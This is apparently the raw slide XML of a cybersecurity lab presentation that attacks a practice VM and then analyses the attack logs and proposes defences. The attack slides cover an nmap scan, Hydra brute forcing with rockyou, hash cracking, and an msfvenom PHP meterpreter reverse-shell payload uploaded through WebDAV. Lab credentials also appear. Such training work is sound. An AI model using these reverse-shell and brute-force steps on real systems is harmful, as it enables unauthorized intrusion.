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112420-F458-404F-819C-C5D52499BAF1}">
  <a:tblStyle styleId="{B0112420-F458-404F-819C-C5D52499BA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424c1181d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424c1181d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424c1180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424c118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0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1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92.168.1.105/company_folders/secret_folder/connect_to_corp_server" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crackstation.net" TargetMode="External"/><Relationship Id="rId5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crackstation.net" TargetMode="External"/><Relationship Id="rId4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crackstation.ne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[Port 80 Open to Public Access]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;110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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255375" y="707225"/>
            <a:ext cx="28938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scan for open ports on the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 - nmap 192.168.1.0/24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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226875" y="1966200"/>
            <a:ext cx="24285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NMAP scan as per screenshot scanned 256 IP addresses and 4 hosts on port 80 and port 22.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0" name="Google Shape;11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75" y="686100"/>
            <a:ext cx="5539075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[Hashed Passwords]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153650" y="686100"/>
            <a:ext cx="23715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hashed password found on the website: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http://192.168.1.105/company_folders/secret_folder/connect_to_corp_server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I took that and cracked with www.crackstation.net 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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125150" y="2769450"/>
            <a:ext cx="24285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website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www.crackstation.net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cracked the hashed password to ‘linux4u’ and that was used to access the /webdav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9" name="Google Shape;111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225" y="686100"/>
            <a:ext cx="6606374" cy="42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[Webdav Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;112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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153650" y="686100"/>
            <a:ext cx="23715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the help of cracked hashed password from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www.crackstation.net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, I opened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dav://192.168.1.105/webdav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the file explorer and used password with username ryan.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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125150" y="2769450"/>
            <a:ext cx="32406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folder is with password.dav file and a file has to be added after the msfvenom command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; open-shell.php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350" y="686100"/>
            <a:ext cx="5778200" cy="40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41" name="Google Shape;1141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42" name="Google Shape;114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7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44" name="Google Shape;11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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527850" y="1593925"/>
            <a:ext cx="331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occur at 12 pm on July 30th 2022.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59,064 connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> at the peak, from ip address 192.168.1.90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sudden peaks in network traffic indicate that this was a port scan</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146" name="Google Shape;11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" y="1467775"/>
            <a:ext cx="5507400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2" name="Google Shape;1152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3" name="Google Shape;115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55" name="Google Shape;11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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177425" y="1752175"/>
            <a:ext cx="341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Requests - 66,922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 and Time: At 7:00 am on 17th November 2020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Files Requested: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/company_folders/secret_folder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/webdav</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;11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7775"/>
            <a:ext cx="5212431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3" name="Google Shape;1163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4" name="Google Shape;116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66" name="Google Shape;11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5" y="1467775"/>
            <a:ext cx="4436751" cy="3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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4781450" y="1713000"/>
            <a:ext cx="394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66,922 requests were made in the attack to access the /secret_folder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Out of which only 6 attacks were successful.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of these attacks returned a 301 HTTP status code “Moved Permanently”.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4" name="Google Shape;1174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5" name="Google Shape;117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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852300" y="1467775"/>
            <a:ext cx="4027500" cy="3269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this directory, a total of 360 requests were made.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Files requested were </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>open-shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> files.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1177" name="Google Shape;11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7775"/>
            <a:ext cx="5212431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5" name="Google Shape;1185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1" name="Google Shape;119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Connection limit alert should be added.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must be at every 1000 connections in an hour.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193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Regularly run a system port scan to detect and audit any open ports.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server IP tables to drop packet traffic when thresholds are exceeded.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9" name="Google Shape;119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detect unauthorized access requests, an alert should be created when these requests do occur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should be at every 5 attempts per hour.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201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Highly confidential folders not to be shared publicly.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data contained within confidential folders and change passwords often.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strong passwords that take years to crack even with rockyou.txt and john the ripper.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7" name="Google Shape;120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401 error detected alert should be created to detect brute force attacks in the future.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should be 15 attacks per hours.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9" name="Google Shape;120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strong passwords that would make brute force attack impossible.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policy where account would be locked if the brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> goes on for more than 1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15" name="Google Shape;121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HTTP-GET Request - An alarm that activates on any ip address that tries to access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 would be set on the alert when the HTTP-PUT request is made.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217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whitelist of trusted IP addresses and ensure my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>firewall security policy prevents all other access.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ensure that access to the webDAV folder is only permitted to specific users.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23" name="Google Shape;1223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should be set for any requests made to access port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Thresholds should be set when more than one requests are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Best things to do are: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Block IP Address other than whitelisted IP addresses.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access to webDAV directory to read only to prevent payloads.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826625"/>
            <a:ext cx="1814100" cy="3851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Azure Hyper-V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ML-RefVm-684427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ctl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50" y="756363"/>
            <a:ext cx="6684641" cy="3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{B0112420-F458-404F-819C-C5D52499BAF1}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Cloud Based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Replicating a vulnerable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Networking Monitoring Machine running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ctl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211025" y="80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{B0112420-F458-404F-819C-C5D52499BAF1}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 with public access CVE-2019-6579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to anyone attempting entry using Port 80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and Folders are readily accessible.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 The attacker can read(and sometimes execute) files on the vulnerable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Accessibility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Authorization to execute and command, and access any resource on the vulnerable device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can be leveraged. Extensive potential Impact to any connected network.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passwords such as simple words, and the lack of password complexity, such as the inclusion of symbols, numbers and capitals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could be discovered by social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engineering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Vulnerabilities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2" name="Google Shape;1092;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="287850" y="83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{B0112420-F458-404F-819C-C5D52499BAF1}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password is not salted it can be cracked via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online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tools such as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1"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www.crackstation.net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programs such as hashcat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the password is cracked, and if a username is already know, a hacker can access system files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Directory Indexing vulnerability CWE-548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view and download content of a directory located on a vulnerable device. CWE-548 refers to an informational leak through directory listing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gain access to source code, or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devise other exploits. The directory listing can compromise private or confidential data.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discover password by Brute Force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CVE-2019-3746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an attacker uses numerous username and password combinations to access a device and/or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system access by use of brute force with common password lists such as rockyou.txt by programs such as ‘John the ripper’, ‘Hydra’, Medusa, Ophcrack, and Brutus.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WebDav on a server and Shell access is possible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WebDav is not configured properly, it can allow hackers to remotely modify website content.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[Brute Force Password]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;109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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232950" y="710800"/>
            <a:ext cx="33732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Hydra which is already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 installed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Kali Linux. I was also required to use password - which i used rockyou list for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http://192.168.1.105/company-folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="12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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398300" y="2992625"/>
            <a:ext cx="29478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provided me with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confirmation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of the login name ‘ashton’ with password ‘leopoldo’ to open the secret folder on company website.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1" name="Google Shape;11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800" y="710800"/>
            <a:ext cx="5466976" cy="40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